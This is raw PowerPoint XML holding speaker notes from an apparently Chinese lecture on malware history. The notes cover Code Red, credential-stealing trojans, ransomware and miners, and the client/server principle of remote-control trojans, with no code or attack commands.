                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>发现并研究。他们将其命名为“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Code Red”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，因为他们当时在喝</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Code Red Mountain Dew</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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3154418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安天科技“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>从反恶意代码到对抗高级威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://mp.weixin.qq.com/s/C30LYAXfyNJovB-hNllCiQ</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i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年开始，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>漏洞逐渐被攻击者用于定向攻击或批量投放恶意代码，而不再被用于编写蠕虫；端点系统的安全性随着</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WindowsXP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等系统的广泛应用得到一定程度的提升，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DEP</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ALSR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等保护技术成为系统的默认安全配置。网络蠕虫的影响趋向衰弱，特洛伊木马的数量开始呈爆炸式增长。随着社交软件、网络游戏用户量持续增加，恶意代码作者的逐利性取代了炫技、心理满足、窥视隐私等网络攻击活动的原生动力，成为网络攻击活动的主要意图。通过窃取网络凭证、游戏账号、虚拟货币等方式的获利行为开始普遍化。此类恶意代码隐匿在计算机中进行窃密活动，很像古希腊特洛伊战争中著名的“木马计”。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18"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i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年至</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2009</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年地下经济运作日趋“成熟”，使恶意代码不再只是属于民间，而是更加向着“职业技术团队”方向发展开发和研究，在此技术支撑下，形成了一条灰色的产业链。此阶段各类木马猖獗，迎来爆发的高峰期，传播范围尤其广泛。而以熊猫烧香为代表的蠕虫恶意代码也开始在这个阶段渐渐消退，退出历史的舞台。随着社交软件、网络游戏的兴盛，窃取网络凭证、游戏账号、虚拟货币类的恶意代码开始流行。另外广告件、僵尸网络、下载者（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Downloader</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）等恶意代码也“遍地开花”。盗取账号类主要以盗取</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>凭证（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>QQpass</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>家族）、网络游戏凭证（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OnlineGames</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>家族）为主，传播方式主要以网页挂马、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>盘为主。此时期杀毒软件开始强化针对网络游戏盗号木马的监测查杀，随后“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>终结者”木马爆发，该木马当选</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>上半年的“毒王”。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>终结者其主要特征是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>盘传播，与杀毒软件等相关安全程序对抗，破坏安全模式，下载大量盗号木马，其变种能够破坏磁盘免疫。</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1035570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安天科技“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>从反恶意代码到对抗高级威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://mp.weixin.qq.com/s/C30LYAXfyNJovB-hNllCiQ</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i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年前后，恶意代码已经完全产业化，通过与地下经济体系深度融合，形成了新的威胁形态。早期盗号木马、广告点击器、浏览器首页锁定器这类恶意代码虽然严重危害系统安全，却并不会导致系统直接停摆，但自</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2013</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年开始，勒索软件、挖矿木马逐步泛滥，开启了新的对抗局面。这一时期的勒索软件，采用比特币作为赎金形式，采用暗网作为不可追踪的支付链路，采用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AES</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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等难于解密的强加密算法来加密用户数据，构成一个难以打破的“铁三角”。同时，挖矿木马也在借助虚拟货币、暗网交易等手段提升隐秘性和不可溯源性。</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1204737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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3467710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上课时应根据最新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CNCERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报告进行更新</a:t>
            </a:r>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10054425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https://www.cert.org.cn/publish/main/upload/File/2019Annual%20report.pdf</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428666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https://www.cert.org.cn/publish/main/upload/File/2019Annual%20report.pdf</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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40118214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6296D1-E5AE-4B9D-879B-9C26B33FA9CE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以远程控制型木马为例介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3737074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967452-4F76-45B7-9363-E2D33D30E586}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241090" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络客户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务模式的原理是一台主机提供服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，另一台主机接受服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。作为服务器的主机一般会打开一个默认的端口并进行监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(Listen), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果有客户机向服务器的这一端口提出连接请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(Connect Request), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器上的相应程序就会自动运行，来应答客户机的请求，这个程序我们称为守护进程。</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8BFBA5-37C9-4B2F-A3D7-0B710D96EB5B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12441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 computer virus is a program that recursively and explicitly copies a possibly evolved version of itself</a:t>
            </a:r>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41212113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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14004147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8BFBA5-37C9-4B2F-A3D7-0B710D96EB5B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
